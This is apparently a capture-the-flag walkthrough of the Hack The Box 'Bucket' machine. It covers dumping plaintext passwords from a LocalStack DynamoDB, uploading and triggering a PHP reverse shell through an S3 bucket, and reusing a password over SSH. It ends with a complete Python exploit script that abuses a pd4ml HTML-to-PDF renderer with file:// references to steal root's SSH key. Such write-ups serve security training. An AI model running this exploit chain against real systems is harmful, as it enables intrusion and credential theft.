User
Started by enumerating ports as always:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ sudo scan bucket.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
TTL: 0
Furious: 16
Nmap: 9
Total: 25
The first thing we see on the landing page is:
If we look at where the images are served from, the URL is http://s3.bucket.htb/adserver/images/, so the site is using S3 buckets as storage.
Since HTB machines run on an isolated network without internet access, this is most likely LocalStack rather than real AWS, and this article explains how to point aws-cli at a LocalStack endpoint with --endpoint-url (LocalStack accepts any dummy credentials).
First we checked whether there was any data in DynamoDB:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb list-tables
TABLENAMES users
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users
None 3 3
PASSWORD Management@#1@#
USERNAME Mgmt
PASSWORD Welcome123!
USERNAME Cloudadm
PASSWORD n2vM-<_K_Q:.Aa2
USERNAME Sysadm
[jusepe@nix:~/Documents/HackTheBox/Bucket]$
Then we used the S3 bucket to upload a PHP reverse shell. The bucket contents end up under the web root of bucket.htb, so simply requesting the uploaded file executes it:
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ aws --endpoint-url=http://s3.bucket.htb s3 cp reverse.php s3://adserver
upload: ./reverse.php to s3://adserver/reverse.php
[jusepe@nix:~/Documents/HackTheBox/Bucket]$ curl http://bucket.htb/reverse.php
Now we have a shell. We checked which users exist on the system and were able to log in as roy via SSH with the last password from DynamoDB (n2vM-<_K_Q:.Aa2), i.e. plain password reuse.
Root
We checked for services listening only on localhost and found what looks like a web application on port 8000 (port 4566 is LocalStack itself):
roy@bucket:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:34825 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
Additionally, the application's source code in /var/www/html/bucket_app is readable by our user, so we checked what it does and found an interesting piece of functionality:
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;

if($_SERVER["REQUEST_METHOD"]==="POST") {
    if($_POST["action"]==="get_alerts") {
        date_default_timezone_set('America/New_York');
        // Talks to the LocalStack DynamoDB on localhost:4566 seen in the netstat output
        $client = new DynamoDbClient([
            'profile' => 'default',
            'region' => 'us-east-1',
            'version' => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);
        // Only items of the "alerts" table whose title is "Ransomware" are rendered
        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
        ));
        // Each item's "data" attribute is written, unsanitised, to an HTML file
        foreach ($iterator as $item) {
            $name=rand(1,10000).'.html';
            file_put_contents('files/'.$name,$item["data"]);
        }
        // The last HTML file written is rendered to files/result.pdf by pd4ml
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
}
The application scans the DynamoDB alerts table, writes the data attribute of every item titled "Ransomware" to an HTML file, and renders the last one to a PDF with pd4ml. The HTML comes straight from a table we can write to through LocalStack, so we tried the HTML-to-PDF SSRF / local file disclosure technique from this guide: if the rendered HTML references a file:// URL, the converter reads that local file with the privileges of the app's process and embeds it in the resulting PDF. We then wrote a Python script to automate creating the alerts table, inserting the malicious alert, triggering the render, and retrieving the file we want (root's id_rsa in this case) as base64.
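The automation script itself is not reproduced on the page; the following is an added reconstruction in Python (my code, not the author's get_root_file.py) of the steps described above: create the alerts table, insert the malicious alert, trigger the render, and print the resulting PDF as base64 so it can be piped through base64 -d. Everything the page does not state is an assumption and is marked as such in the code: the DynamoDB endpoint (the same s3.bucket.htb endpoint the aws CLI used earlier), that the internal app on 127.0.0.1:8000 has been forwarded to the attacking machine with SSH as roy, that the PHP handler is the app's index and that files/result.pdf is served from the same document root, and the exact pd4ml element used for the file:// reference (pd4ml's attachment tag here; change it if the guide you follow uses a different element).

```python
#!/usr/bin/env python3
"""Reconstruction of the alerts-table abuse against bucket_app (not the original script).

Assumptions not stated on the page:
  * DynamoDB is reachable through LocalStack at DYNAMO_ENDPOINT with whatever dummy
    credentials the aws CLI is configured with (LocalStack does not verify them).
  * The app on 127.0.0.1:8000 has been forwarded, e.g.
        ssh -L 8000:127.0.0.1:8000 roy@bucket.htb
    its PHP handler is the index, and files/result.pdf is served from the same root.
  * pd4ml honours <pd4ml:attachment src="file://..."/>; adjust PAYLOAD_TEMPLATE if the
    guide you follow uses another element (iframe, img, link).
"""
import base64
import json
import subprocess
import sys
import urllib.parse
import urllib.request

DYNAMO_ENDPOINT = "http://s3.bucket.htb"   # same endpoint the aws CLI used above
APP_URL = "http://127.0.0.1:8000"          # assumed SSH port-forward of the internal app
TABLE = "alerts"                           # table name hard-coded in the PHP source
# Assumed payload: pd4ml's attachment tag, which makes the renderer read a local file.
PAYLOAD_TEMPLATE = '<pd4ml:attachment src="file://{path}" description="{path}" icon="Paperclip"/>'


def aws(*args):
    """Run the aws CLI against the LocalStack endpoint and return its JSON output."""
    cmd = ["aws", "--endpoint-url", DYNAMO_ENDPOINT, "--output", "json", *args]
    out = subprocess.run(cmd, check=True, capture_output=True, text=True).stdout
    return json.loads(out) if out.strip() else {}


def table_definition(name=TABLE):
    """Minimal table whose hash key is the 'title' string the app filters on."""
    return {
        "TableName": name,
        "AttributeDefinitions": [{"AttributeName": "title", "AttributeType": "S"}],
        "KeySchema": [{"AttributeName": "title", "KeyType": "HASH"}],
        "ProvisionedThroughput": {"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
    }


def malicious_alert(path):
    """Item that passes the FilterExpression (title = Ransomware) and whose data
    becomes the HTML handed to pd4ml."""
    return {
        "title": {"S": "Ransomware"},
        "data": {"S": PAYLOAD_TEMPLATE.format(path=path)},
    }


def plant_alert(path):
    """Create the table (ignoring 'already exists') and insert the malicious item."""
    try:
        aws("dynamodb", "create-table", "--cli-input-json", json.dumps(table_definition()))
    except subprocess.CalledProcessError as err:
        if "ResourceInUseException" not in (err.stderr or ""):
            raise  # any error other than "table already exists" is real
    aws("dynamodb", "put-item", "--table-name", TABLE, "--item", json.dumps(malicious_alert(path)))


def trigger_render():
    """POST action=get_alerts: the app scans the table and runs pd4ml on our HTML."""
    body = urllib.parse.urlencode({"action": "get_alerts"}).encode()
    urllib.request.urlopen(urllib.request.Request(APP_URL + "/", data=body), timeout=60).read()


def fetch_result_pdf():
    """Download the PDF the app wrote to files/result.pdf (assumed to be served)."""
    return urllib.request.urlopen(APP_URL + "/files/result.pdf", timeout=30).read()


def encode_pdf(pdf_bytes):
    """Base64 for stdout, so the caller can `| base64 -d > id_rsa.pdf`."""
    return base64.b64encode(pdf_bytes).decode()


def main(path="/root/.ssh/id_rsa"):
    plant_alert(path)
    trigger_render()
    sys.stdout.write(encode_pdf(fetch_result_pdf()))


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "/root/.ssh/id_rsa")
```

The script shells out to the aws CLI rather than using boto3 so it matches the tooling used earlier in the writeup; only the last item written in the PHP loop is rendered, so a single item is inserted. If the table is wiped between runs (the create-table call tolerates it already existing), just rerun the script.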
Finally we decode the script's base64 output back into the PDF and open it:
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ python3 get_root_file.py | base64 -d > id_rsa.pdf
[jusepe@nix:~/Documents/HackTheBox/Bucket/pwncat]$ open id_rsa.pdf
Here is what the PDF looks like: